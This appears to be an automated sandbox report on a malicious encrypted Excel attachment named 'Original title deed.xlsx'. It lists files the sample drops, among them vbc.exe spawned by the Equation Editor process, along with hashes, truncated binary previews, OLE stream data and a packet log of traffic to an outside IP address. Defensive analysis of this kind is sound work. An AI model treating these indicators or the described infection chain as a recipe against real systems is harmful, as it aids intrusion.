Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsnEF02.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsrD7BA.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss53BD.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nssD5D7.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx8670.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	561231
Entropy (8bit):	7.991520357518498
Encrypted:	true
SSDEEP:	12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
MD5:	9968913B09E0208F6A9CE25397E106A3
SHA1:	5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
SHA-256:	C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
SHA-512:	45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
Malicious:	false
Preview:	:.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	4.462434595158862
Encrypted:	false
SSDEEP:	96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
MD5:	024BBA8A78668315098F21E6E6870F2E
SHA1:	13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
SHA-256:	6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
SHA-512:	EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ue7qbln2lrz74jd4 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	7173
Entropy (8bit):	7.9288168595599275
Encrypted:	false
SSDEEP:	192:kpPhVgCWc+OJqhfj0/m3dD5ehohe2PrKTsddDKz:GZaCW0yfj0/sA8rKTeY
MD5:	C71EE4E61ECF8144240EE54CB9941674
SHA1:	DFF070E5E55F02F14437397FDDA413879BE28155
SHA-256:	BA56EDDB23DE5F224C417A2A784195D29BCC858023CC9227B4F4DA200DC0C6DD
SHA-512:	8FA1106FCBBD009626E7B44A0F78A2816439EEB33D25BADB94566A8A18F4426D2ED7730CDB54F6EE51A9B5901A92F856E5A70BF8FDEC9CFFB6C5B2D402DFDC3C
Malicious:	false
Preview:	.....4.B4.1:...!#.k..H../..Q+..[.C..<U......I.2......i..@..zZ-3...[...38.......7.......A.....I...Qr........_.!.......o//.)+....Q.../1^...].!.;7....[...EI....o23.=?+...yX?.CE......I-SS......q0MM.. ..w=QS~$%'...:_a.34:..Q{o.BCO.6.X..\STT.h.i...`ac.N..._`b.].U...bcc.b.X..copp..m..\|}..r...str......Ez{.+......./1.......9^....C...9.......O.........W....."...i.'...l...MM..+/....Sv..51....W"#.=?)...a./.KMq...q-9.CC......A(MM......o-IKp.....w2OQ.#$"...A[W.+/..}@eiN;<<..Q}..PQS...^...WXZ...m..2Z[[..P..Q_``..]...deg...Z...stz..q../..o..x...stt'H.....1....-...1.....t...?........?......N...}v_S......=,....hJ......N....J...V....L...XD.......l$..... ..r5........=.)..w ...2....%=. ...3...D"#...B...K/0.G.A..\<=...R..j1ST. _..58Z[..+n...{[\..P..H.``...]...."Y=F...`..).3r<U..S.u.....@.E^-)I...t0.o.Js./.....6wv.QZ8?......%.....L...mn....Rs...n...fH..8...p........P.......^@......^....._...p..%...\|...............;...m.1..@ !...>..FE'(..:_a.S4:...e...

C:\Users\user\Desktop\~$Original title deed.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	599035
Entropy (8bit):	7.977146744978909
Encrypted:	false
SSDEEP:	12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
MD5:	669DD51D521BE84D6F2C45012115FC5F
SHA1:	DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
SHA-256:	5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
SHA-512:	77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............\|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.995286357977067
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Original title deed.xlsx
File size:	1173504
MD5:	ef302d177adde99f0a6f2e8a6bc9eda1
SHA1:	ebc1e702f7334f162571ae83a4810fd870766ee3
SHA256:	caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
SHA512:	7e0b03c1bf0a70a387e81aae0ba553dfb24f1cb62fa585a2a570dc94d400e867f88daf0ed8ed479cbf2b5522c58fa98fd50abcefaa1189139e994d6015dd7e75
SSDEEP:	24576:rgV856CB2LCNZOjvtg+Ff7ypoPcKy0pdW7BGpMfhgkraUZzrr54810Qthst:UV+syzoypWcVKMpgkrbZzrra810uGt
File Content Preview:	........................>...............................................................................................z.......\|.......~......................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Original title deed.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1160504

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1160504
Entropy:	7.99982473669
Base64 Encoded:	True
Data ASCII:	% . . . . . . . . . . . . . . . . . H . . 8 , . . . . C . . . . . 7 . $ . . . ? . . . . . . . . . m Y 9 ? 3 . . ^ 6 ^ . 3 . I . . . . - 8 . . . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . . . y . > . . 4 . . . $ e x . . .
Data Raw:	25 b5 11 00 00 00 00 00 12 8d fa a7 ed 03 db 80 be de 48 af 1d 38 2c be 82 f0 85 43 bb 89 b3 cc 1e 37 00 24 d5 bc aa 3f ad da fe f4 9c c8 08 c6 bf 6d 59 39 3f 33 08 1b 5e 36 5e cf 33 04 49 ef 03 d6 ad 2d 38 0f fe d5 a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb e6 79 0e 3e c4 05 34 df a3 d8 24 65 78 f9 f3 fb

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.52717392857
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . [ . . s M . . u . . 9 ~ . . . . . . . . . . . } . . . . . . . . . a . . w . 7 d . . . 0 . C . . U . . . . . . D . ! 1 k 5 l M .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:55:40.404555082 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:40.605144978 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:40.605222940 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:40.605653048 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:40.807997942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:40.808027983 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:40.808039904 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:40.808057070 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:40.808232069 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.008461952 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008495092 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008507013 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008519888 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008538961 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008554935 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008573055 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008589029 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.008675098 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.209563971 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209604979 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209624052 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209641933 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209657907 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209676027 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209691048 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209707975 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209737062 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209748983 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209760904 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209774017 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.209830046 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.209866047 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.213485956 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.411437035 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411473036 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411484957 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411497116 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411518097 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411530018 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411545038 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411561966 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411581993 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411601067 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411617041 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411784887 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.411962986 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.411981106 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412000895 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412019014 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412035942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412050962 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412067890 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412079096 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412091017 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:41.412111044 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:41.412148952 CEST	49165	80	192.168.2.22	172.245.45.28
